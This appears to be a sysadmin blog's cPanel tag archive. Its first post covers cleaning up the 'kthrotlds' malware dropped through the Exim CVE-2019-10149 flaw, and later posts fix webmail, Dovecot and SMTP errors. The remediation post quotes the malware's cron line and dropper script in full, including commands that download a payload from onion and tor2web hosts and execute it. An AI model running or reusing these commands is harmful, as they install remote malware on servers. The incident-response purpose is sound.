Tag Archives: cPanel

kthrotlds CVE-2019-10149 Exim/cPanel

If you found some strange name process like [kthrotlds] running on your server, it
means your server could be affected by CVE-2019-10149 Exim security exploit. Of course process name can be different, first of all you need to kill it:

pkill -9 -f kthrotlds
ps aux | grep kthrotlds # To check if process still exists

Its binnary file created in /usr/bin/ directory:
/usr/bin/[kthrotlds]
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
You need quarantine it or just remove.

You can find TCP connection on this process, so its not kernel procesas like it would like to pretend in your process list.

While fixing this issue my advice is to stop crond service: service crond stop

Than you should find all files which could be affected:

grep -r passwd /var/spool/cron*

*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to ” && wget=”$f” && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk –retry 2 –connect-timeout 22 –max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /.cache/.ntp||${curl} -fsSLk –retry 2 –connect-timeout 22 –max-time 75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /.cache/.ntp||${curl} -fsSLk –retry 2 –connect-timeout 22 –max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /.cache/.ntp||${wget} –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=22 –timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /.cache/.ntp||${wget} –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=22 –timeout=75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /.cache/.ntp||${wget} –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=22 –timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /.cache/.ntp) && chmod +x /.cache/.ntp && /bin/sh /.cache/.ntp

You need to check /etc, /root, /usr/local/bin for bash/sh scripts with malware code, like:

#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST=”https://an7kmd2wp4xo7hpr”
TOR1=”.tor2web.su/”
TOR2=”.tor2web.io/”
TOR3=”.onion.sh/”
RPATH1=’src/ldm’
#LPATH=”${HOME-/tmp}/.cache/”
TIMEOUT=”75″
CTIMEOUT=”22″
COPTS=” -fsSLk –retry 2 –connect-timeout ${CTIMEOUT} –max-time ${TIMEOUT} ”
WOPTS=” –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=${CTIMEOUT} –timeout=${TIMEOUT} ”
tbin=$(command -v passwd); bpath=$(dirname “${tbin}”)
curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi
wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “.wgetrc’-style command” && wget=”$f” && break; done; fi; fi
#CHKCURL=’curl=”curl “; wget=”wget “; if [ “$(whoami)” = “root” ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl=”echo “; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget=”echo “; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; fi; ‘
CHKCURL=’tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to ” && wget=”$f” && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; ‘
LBIN8=”kthrotlds”
null=’ >/dev/null 2>&1′

If its cPanel server, you need to check Exim version like this:

whmapi1 installed_versions packages=1|grep exim

exim: 4.91-4
– exim-4.91-4.cp1170.x86_64

or simple exim –version
Exim version 4.91 #1 built 06-Jun-2019 12:52:02

To patch WHM and Exsim, if you have older versions like v76 or v70. To check your WHM version:

whmapi1 installed_versions packages=1|grep whm
cpanel_and_whm: 11.78.0.27

It means 78.0.27

or
cpanel_and_whm: 11.80.0.14

It means 80.0.14

vi /etc/cpupdate.conf
CPANEL=11.76
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily

Than:
/scripts/upcp

Than back:
vi /etc/cpupdate.conf
CPANEL=release
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily

P.s. Also you need to check /root/.ssh/authorized_keys, /etc/cron.d, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly and etc.

You can all modified file during last 5 days:
find /etc/ -mtime -5 -print

This malware script removes all your previous cron tasks, so you need to restore them from your backups and than enable cron service again.

Webmail Internal Server Error 500 No response from subprocess (php) cPanel

Internal Server Error 500 No response from subprocess (php): The subprocess reported error number 72,057,594,037,927,935 when it ended. The process dumped a core file

Internal Server Error: “POST /cpsess8893829692/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1” 500 No response from subprocess (php): The subprocess reported error number 72,057,594,037,927,935 when it ended. The process dumped a core file.
Failed to write form data to subprocess: Broken pipe at /usr/local/cpanel/Cpanel/Server/Handlers/SubProcess.pm line 296.

rpm -ql cpanel-php72 | grep php-cgi
/usr/local/cpanel/3rdparty/php/72/bin/php-cgi

If you are missing this file you can try reinstall package or download it from another server
yum reinstall cpanel-php72

Policy server HTTP error: 500 Internal Error Temporary internal error: retry timeout exceeded

dovecot: auth: Error: policy(?,xx.xx.xx.xx): Policy server HTTP error: Connection lost: read(127.0.0.1:579) failed: EOF (Request queued 2.784 secs ago, 1 attempts in 2.784 secs, 2.784 in other ioloops, connected 21.780 secs ago)

This error is caused by cPhulkd of cPanel, so you can temporally disable it, while investigating.

Than check for errors:
/usr/local/cpanel/logs/cphulkd_errors.log
/usr/local/cpanel/logs/cphulkd.log

LMTP error after RCPT TO – Temporary internal error: retry timeout exceeded

LMTP error after RCPT TO::
451 4.3.0 Temporary internal error: retry timeout exceeded

dovecot: lmtp(5768): Error: fchown(/home/user/mail/domain.com/info/maildirsizesrv.domain.com.5768.87dedd4b02379106, group=12(mail)) failed: Operation not permitted (egid=507(user), group based on /home/user/mail/domain.com/info – see http://wiki2.dovecot.org/Errors/ChgrpNoPerm)
lmtp(6918): Error: safe_mkstemp(/home/user/mail/domain.tld/info/maildirsize) failed: Operation not permitted

Its cPanel issue, so you cha try update info@xxx.tld mailbox quota to new: Allocated Storage Space

Checking C compiler….Could not locate an executable “gcc” binary….Done ** Unrecoverable Error ** The C compiler is not functional and auto repair failed. Perl module installs require a working C compiler.

Checking C compiler….Could not locate an executable “gcc” binary….Done ** Unrecoverable Error ** The C compiler is not functional and auto repair failed. Perl module installs require a working C compiler

You should find Compiler Access in WHM and enable it for some users.

track delivery issue

DeliveryReporter API internal failure: Cpanel::Exception::Database::Error/(XID 8vnjr9) The system received an error from the “SQLite” database “/var/cpanel/eximstats_db.sqlite3”: SQLITE_CORRUPT (database disk image is malformed) at /usr/local/cpanel/Cpanel/Exception/CORE.pm line 336, line 2. Cpanel::Exception::create(“Database::Error”, ARRAY(0xed7360)) called at /usr/local/cpanel/Cpanel/Exception.pm line 61 Cpanel::Exception::__ANON__(_CPANEL_HIDDEN_, ARRAY(0xed7360)) called at /usr/local/cpanel/Cpanel/DBI.pm line 200 Cpanel::DBI::_create_exception(Cpanel::DBI::SQLite::db=HASH(0xe9cf78) ….

cd /var/cpanel
mv eximstats_db.sqlite3 eximstats_db.sqlite3_old
/scripts/restartsrv_tailwatchd
/scripts/slurp_exim_mainlog –force

SMTP Mail protection has been disabled. All users may make smtp connections.

/scripts/smtpmailgidonly on
SMTP Mail protection has been disabled. All users may make smtp connections.
There was a problem setting up iptables. You either have an older kernel or a broken iptables install, or ipt_owner could not be loaded.

cat /proc/net/ip_tables_matches | grep owner
modprobe xt_owner

/scripts/smtpmailgidonly on
SMTP Mail protection has been enabled.
All outbound SMTP connections will be redirected to localhost except:
uid is root (ports: 25,26,465,587)
uid is cpanel (ports: 25,26,465,587)
gid is mail (ports: 25,26,465,587)
gid is mailman (ports: 25,26,465,587)